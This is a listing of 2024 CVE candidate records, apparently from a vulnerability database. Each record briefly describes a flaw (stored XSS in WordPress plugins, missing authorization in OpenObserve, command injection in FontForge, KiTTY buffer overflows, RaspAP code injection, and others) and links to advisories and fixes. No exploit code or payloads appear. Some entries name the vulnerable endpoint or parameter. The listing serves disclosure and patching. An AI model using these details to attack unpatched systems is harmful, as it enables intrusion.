CVE 2024 25107 Candidate WikiDiscover is an extension designed for use with a CreateWiki managed farm to display wikis. On Special:WikiDiscover, the `Language::date` function is used when making the human-readable timestamp for inclusion on the wiki_creation column. This function uses interface messages to translate the names of months and days. It uses the `->text()` output mode, returning unescaped interface messages. Since the output is not escaped later, the unescaped interface message is included on the output, resulting in an XSS vulnerability. Exploiting this on-wiki requires the `(editinterface)` right. This vulnerability has been addressed in commit `267e763a0`. Users are advised to update their installations. There are no known workarounds for this vulnerability. MISC:https://github.com/miraheze/WikiDiscover/commit/267e763a0d7460f001693c42f67717a0fc3fd6bb | URL:https://github.com/miraheze/WikiDiscover/commit/267e763a0d7460f001693c42f67717a0fc3fd6bb | MISC:https://github.com/miraheze/WikiDiscover/security/advisories/GHSA-cfcf-94jv-455f | URL:https://github.com/miraheze/WikiDiscover/security/advisories/GHSA-cfcf-94jv-455f | MISC:https://issue-tracker.miraheze.org/T11814 | URL:https://issue-tracker.miraheze.org/T11814 Assigned (20240205)
CVE 2024 25106 Candidate OpenObserve is a observability platform built specifically for logs, metrics, traces, analytics, designed to work at petabyte scale. A critical vulnerability has been identified in the "/api/{org_id}/users/{email_id}" endpoint. This vulnerability allows any authenticated user within an organization to remove any other user from that same organization, irrespective of their respective roles. This includes the ability to remove users with "Admin" and "Root" roles. By enabling any organizational member to unilaterally alter the user base, it opens the door to unauthorized access and can cause considerable disruptions in operations. The core of the vulnerability lies in the `remove_user_from_org` function in the user management system. This function is designed to allow organizational users to remove members from their organization. The function does not check if the user initiating the request has the appropriate administrative privileges to remove a user. Any user who is part of the organization, irrespective of their role, can remove any other user, including those with higher privileges. This vulnerability is categorized as an Authorization issue leading to Unauthorized User Removal. The impact is severe, as it compromises the integrity of user management within organizations. By exploiting this vulnerability, any user within an organization, without the need for administrative privileges, can remove critical users, including "Admins" and "Root" users. This could result in unauthorized system access, administrative lockout, or operational disruptions. Given that user accounts are typically created by "Admins" or "Root" users, this vulnerability can be exploited by any user who has been granted access to an organization, thereby posing a critical risk to the security and operational stability of the application. This issue has been addressed in release version 0.8.0. Users are advised to upgrade. MISC:https://github.com/openobserve/openobserve/security/advisories/GHSA-3m5f-9m66-xgp7 | URL:https://github.com/openobserve/openobserve/security/advisories/GHSA-3m5f-9m66-xgp7 Assigned (20240205)
CVE 2024 25103 Candidate This vulnerability exists in AppSamvid software due to the usage of vulnerable and outdated components. An attacker with local administrative privileges could exploit this by placing malicious DLLs on the targeted system. Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code on the targeted system. MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081 | URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081 Assigned (20240205)
CVE 2024 25102 Candidate This vulnerability exists in AppSamvid software due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. An attacker with local administrative privileges could exploit this to obtain the password of AppSamvid on the targeted system. Successful exploitation of this vulnerability could allow the attacker to take complete control of the application on the targeted system. MISC:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081 | URL:https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2024-0081 Assigned (20240205)
CVE 2024 25101 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Maspik – Spam Blacklist allows Stored XSS.This issue affects Maspik – Spam Blacklist: from n/a through 0.10.6. MISC:https://patchstack.com/database/vulnerability/contact-forms-anti-spam/wordpress-maspik-spam-blacklist-plugin-0-10-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/contact-forms-anti-spam/wordpress-maspik-spam-blacklist-plugin-0-10-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25100 Candidate Deserialization of Untrusted Data vulnerability in WP Swings Coupon Referral Program.This issue affects Coupon Referral Program: from n/a through 1.7.2. MISC:https://patchstack.com/database/vulnerability/coupon-referral-program/wordpress-coupon-referral-program-plugin-1-7-2-unauthenticated-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/coupon-referral-program/wordpress-coupon-referral-program-plugin-1-7-2-unauthenticated-php-object-injection-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25099 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David de Boer Paytium: Mollie payment forms & donations allows Stored XSS.This issue affects Paytium: Mollie payment forms & donations: from n/a through 4.4.2. MISC:https://patchstack.com/database/vulnerability/paytium/wordpress-paytium-mollie-payment-forms-donations-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/paytium/wordpress-paytium-mollie-payment-forms-donations-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25098 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pascal Bajorat PB oEmbed HTML5 Audio – with Cache Support allows Stored XSS.This issue affects PB oEmbed HTML5 Audio – with Cache Support: from n/a through 2.6. MISC:https://patchstack.com/database/vulnerability/pb-oembed-html5-audio-with-cache-support/wordpress-pb-oembed-html5-audio-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pb-oembed-html5-audio-with-cache-support/wordpress-pb-oembed-html5-audio-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25097 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode LLC TNC PDF viewer allows Stored XSS.This issue affects TNC PDF viewer: from n/a through 2.8.0. MISC:https://patchstack.com/database/vulnerability/pdf-viewer-by-themencode/wordpress-tnc-pdf-viewer-plugin-2-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pdf-viewer-by-themencode/wordpress-tnc-pdf-viewer-plugin-2-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25094 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Jura & Nicolas Montigny PJ News Ticker allows Stored XSS.This issue affects PJ News Ticker: from n/a through 1.9.5. MISC:https://patchstack.com/database/vulnerability/pj-news-ticker/wordpress-pj-news-ticker-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/pj-news-ticker/wordpress-pj-news-ticker-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25093 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Milan Petrovic GD Rating System allows Stored XSS.This issue affects GD Rating System: from n/a through 3.5. MISC:https://patchstack.com/database/vulnerability/gd-rating-system/wordpress-gd-rating-system-plugin-3-5-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/gd-rating-system/wordpress-gd-rating-system-plugin-3-5-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240205)
CVE 2024 25091 Candidate Protection mechanism failure issue exists in RevoWorks SCVX prior to scvimage4.10.21_1013 (when using 'VirusChecker' or 'ThreatChecker' feature) and RevoWorks Browser prior to 2.2.95 (when using 'VirusChecker' or 'ThreatChecker' feature). If data containing malware is saved in a specific file format (eml, dmg, vhd, iso, msi), malware may be taken outside the sandboxed environment. MISC:https://jscom.jp/news-20240229/ | URL:https://jscom.jp/news-20240229/ | MISC:https://jvn.jp/en/jp/JVN35928117/ | URL:https://jvn.jp/en/jp/JVN35928117/ Assigned (20240205)
CVE 2024 25089 Candidate Malwarebytes Binisoft Windows Firewall Control before 6.9.9.2 allows remote attackers to execute arbitrary code via gRPC named pipes. MISC:https://hackerone.com/reports/2300061 | MISC:https://www.binisoft.org/changelog.txt Assigned (20240204)
CVE 2024 25083 Candidate An issue was discovered in BeyondTrust Privilege Management for Windows before 24.1. When an low-privileged user initiates a repair, there is an attack vector through which the user is able to execute any program with elevated privileges. CONFIRM:https://www.beyondtrust.com/trust-center/security-advisories/bt24-01 Assigned (20240204)
CVE 2024 25082 Candidate Splinefont in FontForge through 20230101 allows command injection via crafted archives or compressed files. FEDORA:FEDORA-2024-e01ef71e64 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCH22HIO2C6M4BZWF5EYIWVFBXL5BQAH/ | MISC:https://fontforge.org/en-US/downloads/ | MISC:https://github.com/fontforge/fontforge/pull/5367 | MLIST:[debian-lts-announce] 20240307 [SECURITY] [DLA 3754-1] fontforge security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html Assigned (20240204)
CVE 2024 25081 Candidate Splinefont in FontForge through 20230101 allows command injection via crafted filenames. FEDORA:FEDORA-2024-e01ef71e64 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCH22HIO2C6M4BZWF5EYIWVFBXL5BQAH/ | MISC:https://fontforge.org/en-US/downloads/ | MISC:https://github.com/fontforge/fontforge/pull/5367 | MLIST:[debian-lts-announce] 20240307 [SECURITY] [DLA 3754-1] fontforge security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00007.html Assigned (20240204)
CVE 2024 25065 Candidate Possible path traversal in Apache OFBiz allowing authentication bypass. Users are recommended to upgrade to version 18.12.12, that fixes the issue. MISC:https://issues.apache.org/jira/browse/OFBIZ-12887 | URL:https://issues.apache.org/jira/browse/OFBIZ-12887 | MISC:https://lists.apache.org/thread/rplfjp7ppn9ro49oo7jsrpj99m113lfc | URL:https://lists.apache.org/thread/rplfjp7ppn9ro49oo7jsrpj99m113lfc | MISC:https://ofbiz.apache.org/download.html | URL:https://ofbiz.apache.org/download.html | MISC:https://ofbiz.apache.org/release-notes-18.12.12.html | URL:https://ofbiz.apache.org/release-notes-18.12.12.html | MISC:https://ofbiz.apache.org/security.html | URL:https://ofbiz.apache.org/security.html | MLIST:[oss-security] 20240228 CVE-2024-25065: Apache OFBiz: Path traversal allowing authentication bypass. | URL:http://www.openwall.com/lists/oss-security/2024/02/28/10 Assigned (20240204)
CVE 2024 25064 Candidate Due to insufficient server-side validation, an attacker with login privileges could access certain resources that the attacker should not have access to by changing parameter values. MISC:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/ | URL:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/ Assigned (20240204)
CVE 2024 25063 Candidate Due to insufficient server-side validation, a successful exploit of this vulnerability could allow an attacker to gain access to certain URLs that the attacker should not have access to. MISC:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/ | URL:https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerabilities-in-hikcentral-professional/ Assigned (20240204)
CVE 2024 25062 Candidate An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free. CONFIRM:https://gitlab.gnome.org/GNOME/libxml2/-/issues/604 | MISC:https://gitlab.gnome.org/GNOME/libxml2/-/tags Assigned (20240204)
CVE 2024 25021 Candidate IBM AIX 7.3, VIOS 4.1's Perl implementation could allow a non-privileged local user to exploit a vulnerability to execute arbitrary commands. IBM X-Force ID: 281320. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281320 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281320 | MISC:https://www.ibm.com/support/pages/node/7122628 | URL:https://www.ibm.com/support/pages/node/7122628 Assigned (20240203)
CVE 2024 25016 Candidate IBM MQ and IBM MQ Appliance 9.0, 9.1, 9.2, 9.3 LTS and 9.3 CD could allow a remote unauthenticated attacker to cause a denial of service due to incorrect buffering logic. IBM X-Force ID: 281279. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/281279 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/281279 | MISC:https://www.ibm.com/support/pages/node/7123139 | URL:https://www.ibm.com/support/pages/node/7123139 Assigned (20240203)
CVE 2024 25006 Candidate XenForo before 2.2.14 allows Directory Traversal (with write access) by an authenticated user who has permissions to administer styles, and uses a ZIP archive for Styles Import. CONFIRM:https://xenforo.com/tickets/BC37EB98/?v=5da7bd5728 | MISC:https://xenforo.com/community/threads/xenforo-2-2-14-released.219044/ | MISC:https://xenforo.com/docs/xf2/permissions/ Assigned (20240202)
CVE 2024 25004 Candidate KiTTY versions 0.76.1.13 and before is vulnerable to a stack-based buffer overflow via the username, occurs due to insufficient bounds checking and input sanitization (at line 2600). This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution. FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables | URL:http://seclists.org/fulldisclosure/2024/Feb/14 | FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) | URL:http://seclists.org/fulldisclosure/2024/Feb/13 | MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html | MISC:http://packetstormsecurity.com/files/177032/KiTTY-0.76.1.13-Buffer-Overflows.html | MISC:https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004 Assigned (20240202)
CVE 2024 25003 Candidate KiTTY versions 0.76.1.13 and before is vulnerable to a stack-based buffer overflow via the hostname, occurs due to insufficient bounds checking and input sanitization. This allows an attacker to overwrite adjacent memory, which leads to arbitrary code execution. FULLDISC:20240213 Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables | URL:http://seclists.org/fulldisclosure/2024/Feb/14 | FULLDISC:20240213 Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749) | URL:http://seclists.org/fulldisclosure/2024/Feb/13 | MISC:http://packetstormsecurity.com/files/177031/KiTTY-0.76.1.13-Command-Injection.html | MISC:http://packetstormsecurity.com/files/177032/KiTTY-0.76.1.13-Buffer-Overflows.html | MISC:https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004 Assigned (20240202)
CVE 2024 25002 Candidate Command Injection in the diagnostics interface of the Bosch Network Synchronizer allows unauthorized users full access to the device. MISC:https://psirt.bosch.com/security-advisories/BOSCH-SA-152190.html | URL:https://psirt.bosch.com/security-advisories/BOSCH-SA-152190.html Assigned (20240202)
CVE 2024 25001 Candidate ** REJECT ** DO NOT USE THIS CVE ID. ConsultIDs: none. Reason: This CVE ID is unused by its CNA. Notes: none. Assigned (20240202)
CVE 2024 2500 Candidate The ColorMag theme for WordPress is vulnerable to Stored Cross-Site Scripting via a user's Display Name in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authentciated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://themes.trac.wordpress.org/browser/colormag/3.1.6/inc/template-tags.php#L845 | URL:https://themes.trac.wordpress.org/browser/colormag/3.1.6/inc/template-tags.php#L845 | MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=221537%40colormag&new=221537%40colormag&sfp_email=&sfph_mail= | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=221537%40colormag&new=221537%40colormag&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b44d89-6f1e-4a23-91ea-e79fc3221183?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4b44d89-6f1e-4a23-91ea-e79fc3221183?source=cve Assigned (20240315)
CVE 2024 24990 Candidate When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000138445 | URL:https://my.f5.com/manage/s/article/K000138445 Assigned (20240202)
CVE 2024 24989 Candidate When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed requests can cause NGINX worker processes to terminate. Note: The HTTP/3 QUIC module is not enabled by default and is considered experimental. For more information, refer to Support for QUIC and HTTP/3 https://nginx.org/en/docs/quic.html . NOTE: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000138444 | URL:https://my.f5.com/manage/s/article/K000138444 Assigned (20240202)
CVE 2024 24988 Candidate Mattermost fails to properly validate the length of the emoji value in the custom user status, allowing an attacker to send multiple times a very long string as an emoji value causing high resource consumption and possibly crashing the server. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240226)
CVE 2024 24975 Candidate Uncontrolled Resource Consumption in Mattermost Mobile versions before 2.13.0 fails to limit the size of the code block that will be processed by the syntax highlighter, allowing an attacker to send a very large code block and crash the mobile app. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240314)
CVE 2024 2497 Candidate A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical. This issue affects some unknown processing of the file includes/provider.php of the component HTTP POST Request Handler. The manipulation of the argument country leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256919 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256919 | MISC:VDB-256919 | RaspAP raspap-webgui HTTP POST Request provider.php code injection | URL:https://vuldb.com/?id.256919 | MISC:https://toradah.notion.site/Code-Injection-Leading-to-Remote-Code-Execution-RCE-in-RaspAP-Web-GUI-d321e1a416694520bec7099253c65060?pvs=4 | URL:https://toradah.notion.site/Code-Injection-Leading-to-Remote-Code-Execution-RCE-in-RaspAP-Web-GUI-d321e1a416694520bec7099253c65060?pvs=4 Assigned (20240315)
CVE 2024 24966 Candidate When LDAP remote authentication is configured on F5OS, a remote user without an assigned role will be incorrectly authorized. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. MISC:https://my.f5.com/manage/s/article/K000133111 | URL:https://my.f5.com/manage/s/article/K000133111 Assigned (20240201)
CVE 2024 24964 Candidate Improper access control vulnerability exists in the resident process of SKYSEA Client View versions from Ver.11.220 prior to Ver.19.2. If this vulnerability is exploited, an arbitrary process may be executed with SYSTEM privilege by a user who can log in to the PC where the product's Windows client is installed. MISC:https://jvn.jp/en/jp/JVN54451757/ | URL:https://jvn.jp/en/jp/JVN54451757/ | MISC:https://www.skyseaclientview.net/news/240307_01/ | URL:https://www.skyseaclientview.net/news/240307_01/ Assigned (20240227)
CVE 2024 2496 Candidate A NULL pointer dereference flaw was found in the udevConnectListAllInterfaces() function in libvirt. This issue can occur when detaching a host interface while at the same time collecting the list of interfaces via virConnectListAllInterfaces API. This flaw could be used to perform a denial of service attack by causing the libvirt daemon to crash. MISC:RHBZ#2269672 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2269672 | MISC:https://access.redhat.com/security/cve/CVE-2024-2496 | URL:https://access.redhat.com/security/cve/CVE-2024-2496 Assigned (20240315)
CVE 2024 2495 Candidate Cryptographic key vulnerability encoded in the FriendlyWrt firmware affecting version 2022-11-16.51b3d35. This vulnerability could allow an attacker to compromise the confidentiality and integrity of encrypted data. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cryptographic-key-plain-text-vulnerability-friendlyelecs-friendlywrt | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cryptographic-key-plain-text-vulnerability-friendlyelecs-friendlywrt Assigned (20240315)
CVE 2024 24945 Candidate A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Share Your Moments parameter at /travel-journal/write-journal.php. MISC:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md | URL:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md | MISC:https://portswigger.net/web-security/cross-site-scripting | URL:https://portswigger.net/web-security/cross-site-scripting Assigned (20240201)
CVE 2024 24943 Candidate In JetBrains Toolbox App before 2.2 a DoS attack was possible via a malicious SVG image MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24942 Candidate In JetBrains TeamCity before 2023.11.3 path traversal allowed reading data within JAR archives MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24941 Candidate In JetBrains IntelliJ IDEA before 2023.3.3 a plugin for JetBrains Space was able to send an authentication token to an inappropriate URL MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24940 Candidate In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 2494 Candidate A flaw was found in the RPC library APIs of libvirt. The RPC server deserialization code allocates memory for arrays before the non-negative length check is performed by the C API entry points. Passing a negative length to the g_new0 function results in a crash due to the negative length being treated as a huge positive number. This flaw allows a local, unprivileged user to perform a denial of service attack by causing the libvirt daemon to crash. MISC:RHBZ#2270115 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2270115 | MISC:https://access.redhat.com/security/cve/CVE-2024-2494 | URL:https://access.redhat.com/security/cve/CVE-2024-2494 | MISC:https://lists.libvirt.org/archives/list/devel@lists.libvirt.org/thread/BKRQXPLPC6B7FLHJXSBQYW7HNDEBW6RJ/ | URL:https://lists.libvirt.org/archives/list/devel@lists.libvirt.org/thread/BKRQXPLPC6B7FLHJXSBQYW7HNDEBW6RJ/ Assigned (20240315)
CVE 2024 24939 Candidate In JetBrains Rider before 2023.3.3 logging of environment variables containing secret values was possible MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24938 Candidate In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24937 Candidate In JetBrains TeamCity before 2023.11.2 stored XSS via agent distribution was possible MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24936 Candidate In JetBrains TeamCity before 2023.11.2 access control at the S3 Artifact Storage plugin endpoint was missed MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240201)
CVE 2024 24935 Candidate Cross-Site Request Forgery (CSRF) vulnerability in WpSimpleTools Basic Log Viewer.This issue affects Basic Log Viewer: from n/a through 1.0.4. MISC:https://patchstack.com/database/vulnerability/wpsimpletools-log-viewer/wordpress-basic-log-viewer-plugin-1-0-4-cross-site-request-forgery-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wpsimpletools-log-viewer/wordpress-basic-log-viewer-plugin-1-0-4-cross-site-request-forgery-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24933 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasidhda Malla Honeypot for WP Comment allows Reflected XSS.This issue affects Honeypot for WP Comment: from n/a through 2.2.3. MISC:https://patchstack.com/database/vulnerability/honeypot-for-wp-comment/wordpress-honeypot-for-wp-comment-plugin-2-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/honeypot-for-wp-comment/wordpress-honeypot-for-wp-comment-plugin-2-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24932 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Djo VK Poster Group allows Reflected XSS.This issue affects VK Poster Group: from n/a through 2.0.3. MISC:https://patchstack.com/database/vulnerability/vk-poster-group/wordpress-vk-poster-group-plugin-2-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/vk-poster-group/wordpress-vk-poster-group-plugin-2-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24931 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in swadeshswain Before After Image Slider WP allows Stored XSS.This issue affects Before After Image Slider WP: from n/a through 2.2. MISC:https://patchstack.com/database/vulnerability/before-after-image-slider/wordpress-before-after-image-slider-wp-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/before-after-image-slider/wordpress-before-after-image-slider-wp-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24930 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes.Com Buttons Shortcode and Widget allows Stored XSS.This issue affects Buttons Shortcode and Widget: from n/a through 1.16. MISC:https://patchstack.com/database/vulnerability/buttons-shortcode-and-widget/wordpress-buttons-shortcode-and-widget-plugin-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/buttons-shortcode-and-widget/wordpress-buttons-shortcode-and-widget-plugin-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24929 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Ryan Duff, Peter Westwood WP Contact Form.This issue affects WP Contact Form: from n/a through 1.6. MISC:https://patchstack.com/database/vulnerability/wp-contact-form/wordpress-wp-contact-form-plugin-1-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-contact-form/wordpress-wp-contact-form-plugin-1-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24928 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arunas Liuiza Content Cards allows Stored XSS.This issue affects Content Cards: from n/a through 0.9.7. MISC:https://patchstack.com/database/vulnerability/content-cards/wordpress-content-cards-plugin-0-9-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/content-cards/wordpress-content-cards-plugin-0-9-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24927 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme allows Reflected XSS.This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6. MISC:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24926 Candidate Deserialization of Untrusted Data vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme.This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6. MISC:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/brooklyn/wordpress-brooklyn-theme-4-9-7-6-php-object-injection-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24925 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application is vulnerable to uninitialized pointer access while parsing specially crafted Catia MODEL files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-22060) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
CVE 2024 24924 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22059) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
CVE 2024 24923 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000), Simcenter Femap (All versions < V2306.0001). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted Catia MODEL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22055) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
